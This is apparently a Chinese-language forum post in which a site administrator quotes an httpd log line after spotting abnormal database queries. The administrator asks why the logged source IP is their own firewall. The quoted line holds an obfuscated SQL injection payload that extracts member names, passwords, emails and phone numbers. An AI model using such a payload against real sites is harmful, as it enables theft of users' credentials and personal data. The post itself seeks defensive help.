各位大大日安
事情是這樣子的
某天我發現資料庫有一些異常SQL 在跑, 然後呢, 我就想說不然查一下httpd 的log好了
看看該時段有什麼
ip 在做這事
一開log 完全呆住
192.168.0.1 - - [13/Apr/2020:02:39:11 +0800] "GET /Zgot.php?title=47'+%2f**%2f%2f**%2fuNiOn%2f**%2fAlL+%2f**%2f%2f**%2fsElEcT(%2f**%2f%2f**%2fsElEcT+%2f**%2f%2f**%2fuNhEx(%2f**%2f%2f**%2fhEx(%2f**%2f%2f**%2fcOnCaT(0x3f7e21,ifnull(mb_no,char(32)),0x3f3a21,ifnull(mb_name,char(32)),0x3f3a21,ifnull(mb_pwd,char(32)),0x3f3a21,ifnull(country,char(32)),0x3f3a21,ifnull(email,char(32)),0x3f3a21,ifnull(tel1,char(32)),0x3f3a21,ifnull(tel2,char(32)),0x3f3a21,ifnull(tel3,char(32)),0x3f7e21)))+%2f**%2f%2f**%2ffRoM+eh.mbst+%2f**%2f%2f**%2flImIt+70566,1),2,3,4,5,6,7,8+and+'1'='1 HTTP/1.1" 200 16907
開頭該記錄的ip 居然是我防火牆的
那外部呢???
不知道有那位大大能解在下的惑
感激不盡
內文搜尋

X